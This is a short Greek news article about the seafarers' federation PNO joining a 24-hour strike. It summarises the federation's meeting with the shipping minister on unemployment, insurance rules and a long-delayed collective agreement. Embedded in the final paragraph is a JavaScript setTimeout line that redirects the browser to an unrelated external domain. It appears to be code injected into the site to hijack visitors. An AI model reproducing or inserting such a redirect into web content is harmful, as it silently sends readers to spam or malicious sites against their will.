Δεμένα τα καράβια αύριο – 24ωρη απεργία στην ΠΝΟ

0
11

Στην 24ωρη απεργία που εξήγγειλε η ΑΔΕΔΥ συμμετέχει και η ΠΝΟ που είχε χθες συνάντηση με τον υπουργό Ναυτιλίας και Νησιωτικής Πολιτικής Παναγιώτη Κουρουμπλή.

Οι εκπρόσωποι των 13 ναυτεργατικών σωματείων έθεσαν σειρά ζητημάτων όπως αυτό της ανεργίας, του ασφαλιστικού, του θεσμικού πλαισίου της ακτοπλοΐας αλλά και το θέμα της υπογραφής νέας συλλογικής σύμβασης εργασίας στην ποντοπόρο ναυτιλία που εκκρεμεί από το 2010.

Για το θέμα της ανεργίας οι συνδικαλιστές των ναυτεργατικών σωματείων ζήτησαν η ναυτολόγηση ναυτικών στα πλοία να γίνεται μέσω του Γραφείου Ευρέσεως Ναυτικής Εργασίας, βάσει της ισχύουσας συλλογικής σύμβασης εργασίας, ενώ έθεσαν και θέμα τροποποίησης του νόμου 4150/13 που δίνει το δικαίωμα στον εκάστοτε υπουργό για τα πλοία της ακτοπλοΐας που προσεγγίζουν σε λιμάνια του εξωτερικού να καθορίζει τη σύνθεση κατ’ εξαίρεση, με αποτέλεσμα στα πλοία αυτά να απολύεται τον χειμώνα περίπου το 50% του προσωπικού των ειδικών κατηγοριών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here